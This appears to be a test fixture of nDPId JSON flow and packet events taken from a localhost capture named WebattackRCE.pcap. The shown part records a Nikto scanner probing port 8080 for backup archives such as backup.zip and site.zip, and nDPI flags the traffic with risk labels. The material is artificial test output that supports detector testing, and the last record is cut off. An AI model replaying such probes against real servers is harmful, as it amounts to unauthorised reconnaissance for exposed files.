{"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1576420276980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276980,"pkt":"AAAAAAAAAAAAAAAACABFAADBB+JAAEAGNFN\/AAABfwAAAcMUH5Dk6j++IkHQl4AYAED+tQAAAQEICp1m\/BydZvwcR0VUIC8xMjcuMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":198,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276982,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1576420276982,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276982,"pkt":"AAAAAAAAAAAAAAAACABFAAC98llAAEAGSd9\/AAABfwAAAcMWH5DjKcoLls+qsoAYAED+sQAAAQEICp1m\/B6dZvwdR0VUIC8xLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276982,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1576420276983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276983,"pkt":"AAAAAAAAAAAAAAAACABFAAC9nNlAAEAGn19\/AAABfwAAAcMYH5CM06SLK3vm\/IAYAED+sQAAAQEICp1m\/B+dZvwfR0VUIC8xLmFseiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276985,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1576420276985,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276985,"pkt":"AAAAAAAAAAAAAAAACABFAADCh5hAAEAGtJt\/AAABfwAAAcMaH5DK+b\/J7Nxpa4AYAED+tgAAAQEICp1m\/CGdZvwgR0VUIC9iYWNrdXAuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276985,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1576420276986,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276986,"pkt":"AAAAAAAAAAAAAAAACABFAADC6rNAAEAGUYB\/AAABfwAAAcMcH5BJJNLw4gK1PYAYAED+tgAAAQEICp1m\/CKdZvwiR0VUIC9iYWNrdXAuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276987,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1576420276987,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276987,"pkt":"AAAAAAAAAAAAAAAACABFAADABtBAAEAGNWZ\/AAABfwAAAcMeH5DVkj6SMBYRsYAYAED+tAAAAQEICp1m\/COdZvwjR0VUIC9zaXRlLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276987,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1576420276989,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276989,"pkt":"AAAAAAAAAAAAAAAACABFAADAb4pAAEAGzKt\/AAABfwAAAcMgH5DktVfY9BOJ1YAYAED+tAAAAQEICp1m\/CWdZvwlR0VUIC9zaXRlLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1576420276990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276990,"pkt":"AAAAAAAAAAAAAAAACABFAADGkTtAAEAGqvR\/AAABfwAAAcMiH5BqAalni+2D0IAYAED+ugAAAQEICp1m\/CadZvwmR0VUIC8xMjcuMC4wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1576420276992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276992,"pkt":"AAAAAAAAAAAAAAAACABFAADGaPFAAEAG0z5\/AAABfwAAAcMkH5B8x1CQWvOvzIAYAED+ugAAAQEICp1m\/CidZvwoR0VUIC8xMjcuMC4wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1576420276993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276993,"pkt":"AAAAAAAAAAAAAAAACABFAADFOFRAAEAGA91\/AAABfwAAAcMmH5DTogAzSwYGfYAYAED+uQAAAQEICp1m\/CmdZvwpR0VUIC8xMjdfMF8wXzEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276995,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1576420276995,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276995,"pkt":"AAAAAAAAAAAAAAAACABFAADFLPBAAEAGD0F\/AAABfwAAAcMoH5DgsBSPBaIHeIAYAED+uQAAAQEICp1m\/CudZvwrR0VUIC8xMjdfMF8wXzEudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276995,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 